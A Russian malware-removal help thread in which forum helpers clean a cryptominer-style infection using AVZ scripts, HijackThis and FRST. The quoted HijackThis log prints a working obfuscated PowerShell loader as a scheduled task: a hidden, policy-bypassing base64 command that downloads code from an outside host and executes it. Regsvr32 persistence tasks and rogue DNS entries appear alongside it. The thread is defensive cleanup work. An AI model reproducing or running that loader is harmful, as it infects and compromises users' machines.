Здравствуйте! В системе постоянно запускается regsvr32.exe и грузит проц.
Начал читать тему http://forum.oszone.net/thread-332245-2.html , но там написано, что инструкции пишутся индивидуально. Если это как-то поможет: то проблема, кажется, появилась после установки программы для майнинга "Kryptex", хотел попробовать, что это такое. Программу удалил, но эта фигня постоянно запускается. Пробовал сканировать 360TS а также очистил всё, что нашёл adwcleaner, но не помогло.

Прокси сами настраивали?
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: [ProxyServer] = 173.212.202.65:80 (disabled)
R1 - HKLM\System\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies: (default) = 1163.172.220.221:8888


Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО (http://safezone.cc/forum/showthread.php?t=18577).

Выполните скрипт в АВЗ (http://forum.oszone.net/post-1430637-4.html) (Файл - Выполнить скрипт):


begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('C:\PROGRA~3\10acb4e4\2df70657.dll','');
DeleteFile('C:\PROGRA~3\10acb4e4\2df70657.dll','32');
ExecuteFile('schtasks.exe', '/delete /TN "{0C0B7A47-0D0E-0D79-7F11-0E080A051179}" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "{F7021E1C-2469-EF38-13AF-A44D7DF2DE14}" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "000137E8-52F5-89BA-D86F-91C07B8ED848" /F', 0, 15000, true);
ExecuteRepair(1);
RebootWindows(true);
BC_Activate;
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
BC_ImportALL;
RebootWindows(true);
end.


Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы (http://www.oszone.net/virusnet/) или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

"Пофиксите" в HijackThis (http://forum.oszone.net/post-1430293-2.html) (некоторые строки могут отсутствовать):

O17 - HKLM\System\CCS\Services\Tcpip\..\{159fafbb-4099-49bb-971b-d89130e30e3d}: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{159fafbb-4099-49bb-971b-d89130e30e3d}: [NameServer] = 82.163.143.176
O17 - HKLM\System\CCS\Services\Tcpip\..\{4d1eaf74-2b79-4684-9990-a6f8aff2b061}: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{4d1eaf74-2b79-4684-9990-a6f8aff2b061}: [NameServer] = 82.163.143.176
O17 - HKLM\System\CCS\Services\Tcpip\..\{51b9bf77-56ff-47f5-a6c2-d6a5bee784c9}: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{51b9bf77-56ff-47f5-a6c2-d6a5bee784c9}: [NameServer] = 82.163.143.176
O17 - HKLM\System\CCS\Services\Tcpip\..\{577e598b-f2d4-4e73-9119-719546b1c774}: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{577e598b-f2d4-4e73-9119-719546b1c774}: [NameServer] = 82.163.143.176
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: [NameServer] = 82.163.143.176
O22 - Task: 000137E8-52F5-89BA-D86F-91C07B8ED848 - C:\WINDOWS\SysWOW64\regsvr32.exe /n /s /i:"/32416c8d1fa3a497 /q" "C:\Users\User\AppData\Local\FFFD37~1\{2DF70~1."
O22 - Task: {0C0B7A47-0D0E-0D79-7F11-0E080A051179} - C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAOwAgADsAIAAgADsAOwA7ACAAOwAgADsAOwAgACAAIAA7ADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBl AHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQA VwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBl AG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcA UAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABZAEoASQBFAFIAUgBEAFoAQwBFAF8ASwBF AEgAUABaAFkAQQAoACQAcAApAHsAJABuAD0AIgBXAGkAbgBkAG8AdwBQAG8AcwBpAHQAaQBvAG4AIgA7AHQAcgB5AHsATgBlAHcA LQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AHQAcgB5AHsATgBl AHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAcAAgAC0ATgBhAG0AZQAgACQAbgAgAC0AUAByAG8A cABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBO AHUAbABsADsAOwB9AAoAYwBhAHQAYwBoAHsAdAByAHkAewBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEA dABoACAAJABwACAALQBOAGEAbQBlACAAJABuACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1 AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQA7AH0AOwB9AFkASgBJAEUAUgBSAEQAWgBDAEUAXwBLAEUASABQAFoAWQBBACgAIgBIAEsA QwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBXAGkAbgBk AG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXwB2ADEALgAwAF8AcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAKQA7AFkA SgBJAEUAUgBSAEQAWgBDAEUAXwBLAEUASABQAFoAWQBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0 AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAWQBKAEkARQBSAFIA RABaAEMARQBfAEsARQBIAFAAWgBZAEEAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAB0AGEAcwBrAGUAbgBnAC4AZQB4 AGUAIgApADsACgAkAHMAdQByAGwAPQAiAGgAdAB0AHAAOgAvAC8AYgByAGkAZwBoAHQAYwBoAGkAZQBmAC4AYwBvAG0ALwB1AC8A PwBhAD0ATQBiADUASQA0AEsAagBDAGEAWgBIAHAAWgBEADMAegBoAE4AWQBQAEgAeQA2AGQASwBEAEgAOABWAGcATwAzAGIASgB3 AEQATgBOAGsAQQBuAHkAeQBMAE0ATgBJAGIAaQBJADEAVwBoAFMAZgB0AHoARQAtAFIAUgB3ADQATwB4AFcAZAA1AF8AbQBCAFUA TwA0AGsALQBJAHEAVQB1AHoAMwA0AFEAMwBlAEEAUwBPAF8AbQBjAHYARQB2ADEAcwBNAHcAWABkAHgAcQAzADYAcwB6AHgARwBQ AC0ASwB6AGYAbABOAGMAcAB3AGEAZwA2AGkAZgBRAGIANAA1AEEAUgBjAFoAWQBNAE0ARQBuAFkAdQBfAGYAQQBSAHMAdABHAFMA OQBHAE0ASwBhAHgAVwBWAGQATgBCAHMAQwBfAC0AbQBiAFgAegBTADAANwBKADIAeABjAGcANgBHAHEAcwBPAEEAawBGADMAawBZ AHMAcABYAEwAYQBaAHAAcwBfAHMAUgB3AFMAegBKAEYAeABzADgAZABMAEwAMABsAGMATQBFAHIAQgB5AHcAXwBkAC0AYQBNAEgA OQBtADcAVgBRAG8AeQA5AEEAZQAtAG0AeAA0AHMAYwBjAGUAawA1AGwAOQBHAHkANQA4ADMAXwBkAGwAOAA2AFkAXwBNAEkAdgAx AE0AbwBJAHkAUgB6AFEASABtAGcAZgBlAHYAVQBkADYATABQAHoASgBEAHUANABSAFcAZwBVAFoAOQBYAHgAdwBsAGEASgBGADEA RQBVAEEAegBDAFQATwBFAE8ANAA0AFkAagBtAGwATABEADEATgBCAEYAVwB0ADcAWgBZAHAAYgA1AGkAeQByADYAeQBIAHAAQwBZ AGEAeQB2AEsAVQBBAHIATgBIAHkAVABFAE4AYwAyAEgATwB2ADkAaABZAGEATgB0AE8ASABxAGwAUABYAFEAYgBhADUAdwBtAEMA cQBaAFUATQAwAHIAaABrAHAAYQB6AEkARABLAEMAcABQADgAMwA3AFoAawA2AFIASABnAEgAMQBBAEUAUwA4AFMAbwB5AEYAYgBu AFkAcQBVADMAUgBnAGYAbQB3AEUAXwB2AHkAcQBEAGwAYwB2AGgANgBjAG0AQQB0AHkAMgBnADEALQB0AEkATAB3AEwAYgBXAFgA TABFAE8AMABCADIAdABPADUAZABUAGIAUQByAGQANABsAG8AbwBJAHMAMQBCAEMATgBYAHQAOQBqAHAAZQByAEwAOABWAGYAdwBI AHQARwBxAFMANAByAHMAdABXAHYAVQA5AFYAQwB1AHgANQBYAGgAcQBjADAAUQAzAEkANABkAG0ATQBZAHUAeABXAE0AQQAxADkA bgBCADgANABxAEsAZQA1AGgARABtAFYAVAB1AFgAQwAzAHIAUwBpAGQAQgBGADIAUgBvAGsAbAA2AE8AdABSAFIAMgBYAGUAXwBk AGgAeABHAHAAYgA2AGEAMQBfAEMAZgBkAE8AbwBJAFEASwB2AG8AdgA4AHIAZQBpAGsAbQBhAE8AVgBLAEoAcgBTAG8AUQAyAHgA bQBzAHAAXwB4AHkAYgBSAG0AeABBAEsATwBuAGEAMABYAHUAZwBRAHcAbABaAEcAOABPAFcAUgBhAFcAYgB0AHgAVQBaAEUAOABL AEcAYQBJAFEAdgBjADQAYgAxADIAaQBzAC0AZAA1ADcAeABXAGQAdQBzAGsAZQBkAGIAbwBiAHYAdQBzAG8AVQB5AFQAQQBKAHEA YgBCADAAVgA4AFoAUABVAGkAQgBEAFEAdgBGAHQAZQBhAHUAbQA3AE8AQgA5AGIATABrAGkAdQBRAC0AaABIAEkAbgBNAG8AMgBT AFMARABMAGYAOABxADMAYwBPAG8AVAB1AFgAQwBqAHQAbABXAEYAdgBRAHcAYgBsADAAcQB5ADIAVQBWAG0AYQBHAFoAYgBaAFUA VABGAHQAeABuAHIAVgBTAG0AcQAwAG8ASQBiAEkAVgBWAHYAMQBBAE8AdgBGAHEAcgBnADcAWAB0AGwAegBKAHIASQBYAFcAUQBH AGIAaQA0AEEAUQBDAFEAeABxAHAAcgByAGgAYQBBAFkAZQBYAGsAYQBFAEQAQwBiADIAdwAtAFcAVgBuAE0ASwBLAHgARgBvAEMA eAA0ADgAOQBRADQATQAwAG0ARQAwAFkAZwBOAGEAegBZAHQAOAAwAHMAQwA1AHoANABlAHMAXwB3ADIANAB6AFAATAB3AEIAbQBu AFYASgBkAF8AUQA0AHkAYgA3AEEAMgBUADgARwA2AEsAOQBfAGcAdgA0AG4AeABWAG0AMQBnAEMAWABsAC0AOAB4AFYAVgBuAFMA bQB2AHgAXwA2AEMAaABGAEMANwByAE0AMQBKAFcASABZADQAUABoAGsAUABmAGcAUgBXAEYASQA4AHkANgBkAFUALQBOAGEAdQAy AGwAbQBOAHMATQA5AEIAbQBWADMAVABrADYAUwBhAFoARwBKAFcAVgB1AGMAMABHAHAAbgBNAEcARAA5ADYAcgBzAGEAcAAtAFAA JgBjAD0ARwBkAHQAbABvAGoAQQByAHgAbwB6ADAATwBQAEMAWABwAFkAeAB2ADIAZABMAHcATgB5AG4ARQBZAHQASABCAHkAMgBm AGsAMQAzAG8AMQAzAFUAZwBfADAARQBXAFIATwBNAEwAdQBKAEcAeQBaAGsANABYAFcAOQA1ADcAdwBjAFoAQQA1AC0ASwBpAE0A SgBMAFMAdgAxAFQAdABUAEMALQAtAFMARgByADQAYwB2ADAAQQBfAGsAcwAwAHYAaABPAFEAeQBGAGUAWAB5AGgATwAzAGUANgBy AEkAdwB6AFIATQBjAFgAcAB3ADYASABtAGkAbAB5AHAAegBFAFoAeQBsAHgAbABfADUATQA3ADYAcwBxAE0AUQBIAGsAZgBDAHgA awBvAC0AQgBqADQATQBoAEgATQBTAFoAMwA5AHEAZABnADEAawBXAGoATQBPAFQAUwBpADMAawBBADUANgBDAEwANQBpAF8AbAA2 ADUAQQBtAHoAMwA5AHkAVgBlAFUAagAyAGoAQgBrAGwAOQBFADAAQgBHAF8AUABlAHIATgBNAF8AWQBoAHMAMQBoAEgAbQBoAFcA XwBFAG0AQgA2AHkAOABtAG0ARABDAHYAYwBLAHkAWgBhAEoAUwBjAEwAWgBfAGYANgB0AFkATwBnAFAATgA4ADAAdQBjAFEAdAB1 AGkAUABnAHgARABzAG4AMQBNAHgAMQAyAGoAMwBsAFYAZwAxAGkAbABVAHcAdQBuADQAcABjAGQAaQBjAGIAdABpADEAUQBoAGYA eQBuADEAOABHAHIASQAyAEgAdgB4AFMAbQBYAEIANgAxADYAYgBVAEsAQwBBAHcAdABUAGgAeQByADkAXwAyAGcASgBRAEIANwBs ADIATwBFADEARgBNAHIAUgAtAHcAZgBjAHkAOAByAFoAcwA5AE0AegByAGoAQQBPAFAAVQByAEQAagA4AEEARAAzAFQAOABLAEMA dgBqAGcAagBjADEAdwBNAGIAWgBWAE8AeQAwAGwAUAB2AHUAVwBPAGoAMgB4AF8ATAB3AEsAVgAzAHAAQQBiAEgAMwBpAHgAYgBa AEgAegBkAGIAYgB4AEIARQBiADQAcQBWADUAYwBwAEcAcQBDAE4AbgBmAFcAdwBOADAARwBCADgAQwBRAHUAUAByAG8AcgBjAGcA YgBqADAAMABsAFUAMQB1ADAAQwBVAG4AdgBvAEwATABiAEEARgBBAG0ANgBkAGgAYgBaAFcAZABNAEYASgA1AGkAUgBtADEAZgBK AHkAZgBuADAAVQBSAEgAcwBpAFIASgBqADkARQB0ADUAVABZAC0AcQBxAEUANgA0AHQAWQBDAGcAcgA1AGoAQwBDAHIAdwBGAFMA NABYAGkAMwAwADMAWQByAGEAeQBkAGEAUwBrADcAWQBNAFMAOABjAHQAMQBBAGgAYwBlAFAATABjAGQAdwAwAFUAdQBiAFEAZgAw AFgAZQBGAGIAZgBMAHUASwBlAEEAMQBkAFoAZQBqADAAbABvADMAUgBXAEoAaQBPADQAUAA1AFoAZwBYAGsAbwBhAGYAcgB3ADgA NABRAHQAMQBpAG4AWQBCAEIAbABvADQAQgBvAEsAdwBEAEIAbAA4AGQANgBvAG8AMwBkAFIAaABjADcAQwA4AF8ANwBpAHcAbwBZ AEcAbgBWAF8ARwBMAC0ASwBsAHEAMwBaADYARQBxADMAUABMADIAMQBaAHYAVgAxADkAUwB2AEEARwAwAFMAWgBYAFMAdQBOAFgA aABPAEIAbgB1ADMAaQBrAHEANwBrAEEAbQByADUAYgBvAGMAOABsAFAAdQBLAGsAQgA1AE4AcwBrAHkAMgBsAEMAMwBkAHMAcwB0 AE4AWABsAG0AVwB2AGgAaABOAEsAVABiAGYAcQBtAHQARwBrAEEASgA0ADIANwBBAE4ATwBzAE0AUwB5AGUAUABpAHUAQwB0ADYA RwBBAHQAeAA1ADAAMwBSAGUAQwA5ADkAMgByAFQAVgBvADYAQQAtAEwARAAtADQAWABXAFAAUQA4AFcASQBJAHMANwBHAHoARABL AHQAWQB2AHgAOABVAFAAQgBIAEYATABNAHAANQBVAHQAaQBHAG8ANgBaADMANQBhAGYAcgA0AEEAWABLAHQATgBrAGMAWABnADMA bQA0ADQATQBTAGcAJgByAD0AMgAxADIAMQA5ADIAOAA3ADAANQA4ADQAOQA0ADQANgA4ADYAMAAiADsAJABzAHQAcwBrAD0AIgB7 ADAAQwAwAEIANwBBADQANwAtADAARAAwAEUALQAwAEQANwA5AC0ANwBGADEAMQAtADAARQAwADgAMABBADAANQAxADEANwA5AH0A IgA7ACQAcAByAGkAZAA9ACIAZgBsAG8AYQB0AGkAbgBnACIAOwAkAGkAbgBpAGQAPQAiAFIAVABXAFAAVwBQAFUATgAiADsAdABy AHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAA LQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwAgAH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABd ADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAA NQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBP AGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAA YQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBO AE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkA cABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0 AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4A UAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBz AHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAWgBUAEYARgBTAFUAVwBUAFQA TABCACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBi AEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUA ZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABs AGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAA TgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBu AGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgA JAB1AHIAbAApACkAOwA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABBAFIATwBQAEMAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0 AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEA KQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBv AHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkA XQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1 ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQA ZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0 AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwA MgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAu AEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQA bwBFAG4AZAAoACkAOwA7AH0ACgAkAHMAYwA9AEEAUgBPAFAAQwAoAFoAVABGAEYAUwBVAFcAVABUAEwAQgAoACQAcwB1AHIAbAAp ACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMA YQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
O22 - Task: {F7021E1C-2469-EF38-13AF-A44D7DF2DE14} - C:\WINDOWS\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\10acb4e4\2df70657.dll"


Скачайте Farbar Recovery Scan Tool (http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве ('https://safezone.cc/threads/17759/').

Прокси сам настраивал.
quarantine.zip создаётся пустым и весит 1кб. Есть смысл отправлять его по форме?
Отчёты отправляю

Забыл упомянуть - пофиксил в HijackThis . После перезагрузки уже в течение трёх часов не наблюдаю данной проблемы.

uarantine.zip создаётся пустым и весит 1кб. Есть смысл отправлять его по форме? »
Не нужно тогда.

Сами политики настраивали?
HKLM\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1
HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1
HKLM\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKLM\...\Policies\Explorer: [NoResolveSearch] 1

Отключите до перезагрузки антивирус.
Выделите следующий код:
Start::
CreateRestorePoint:
HKU\S-1-5-21-4254744389-2531880652-1270121733-1001\...\Policies\Explorer: []
GroupPolicy: Restriction <==== ATTENTION
SearchScopes: HKU\S-1-5-21-4254744389-2531880652-1270121733-1001 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL =
HKU\S-1-5-21-4254744389-2531880652-1270121733-1001\Software\Classes\.scr: scrfile => <==== ATTENTION
EmptyTemp:
Reboot:
End::

Скопируйте выделенный текст (правой кнопкой - Копировать).
Запустите FRST (FRST64) от имени администратора.
Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве ('http://safezone.cc/threads/17760/').

Не помню чтобы сам политики настраивал)

Не помню чтобы сам политики настраивал) »
Тогда фиксим

Отключите до перезагрузки антивирус.
Выделите следующий код:
Start::
CreateRestorePoint:
HKLM\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1
HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1
HKLM\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKLM\...\Policies\Explorer: [NoResolveSearch] 1
EmptyTemp:
Reboot:
End::

Скопируйте выделенный текст (правой кнопкой - Копировать).
Запустите FRST (FRST64) от имени администратора.
Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве ('http://safezone.cc/threads/17760/').

После перезагрузки уже в течение трёх часов не наблюдаю данной проблемы. »
Тогда сразу финальные рекомендации
Подготовьте лог лог SecurityCheck by glax24 (http://safezone.cc/threads/kak-podgotovit-log-securitycheck-by-glax24.19945/)

Ознакомьтесь: Рекомендации после лечения (http://safezone.cc/threads/rekomendacii-posle-udalenija-vredonosnogo-po.16715/)


Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:
Запустите AVZ.
Выполните обновление баз (Меню Файл - Обновление баз)
Закройте все приложения, и запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
Закачайте полученный архив, как описано на этой странице (http://avz.safezone.cc/).
Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: RGhost (http://rgho.st/), Zippyshare (http://www.zippyshare.com/), My-Files.RU (http://my-files.ru/), karelia.ru (http://file.karelia.ru/), Ge.tt (http://www.ge.tt/) или WebFile (http://webfile.ru/)) и укажите ссылку на скачивание в своём следующем сообщении.

Финальные логи. Кажется, проблема решена. Спасибо огромное! Так это был майнинг криптовалюты или амиго какой-нибудь?

Исправляем по возможности
------------------------------- [ Windows ] -------------------------------
Internet Explorer 11.125.16299.0 Внимание! Скачать обновления (https://www.catalog.update.microsoft.com/Search.aspx?q=KB4074588)
^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
Запрос на повышение прав для администраторов отключен
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
--------------------------- [ FirewallWindows ] --------------------------- (просто включите защиту 360 Total Security)
Отключен доменный профиль Брандмауэра Windows
Отключен общий профиль Брандмауэра Windows
Отключен частный профиль Брандмауэра Windows
-------------------------- [ OtherUtilities ] ----------------------------
7-Zip 16.04 (x64) v.16.04 Внимание! Скачать обновления (http://www.7-zip.org/download.html)
^Удалите старую версию, скачайте и установите новую.^
WinRAR 5.31 (32-разрядная) v.5.31.0 Внимание! Скачать обновления (http://www.rarlab.com/download.htm)
Ghostscript GPL 8.64 (Msi Setup) v.8.64 Внимание! Скачать обновления (https://ghostscript.com/download/gsdnld.html)
-------------------------------- [ Java ] ---------------------------------
Java 8 Update 161 v.8.0.1610.12 Внимание! Скачать обновления (http://www.oracle.com/technetwork/java/javase/downloads/jre8-downloads-2133155.html)
^Удалите старую версию и установите новую (jre-8u162-windows-i586.exe)^
------------------------------- [ Browser ] -------------------------------
Mozilla Firefox 54.0.1 (x86 ru) v.54.0.1 Внимание! Скачать обновления (https://www.mozilla.org/ru/firefox/new/)
---------------------------- [ UnwantedApps ] -----------------------------
Ace Stream Media 3.1.16.1 v.3.1.16.1 Внимание! Нежелательное ПО. Описание программы. (http://safezone.cc/threads/24813/)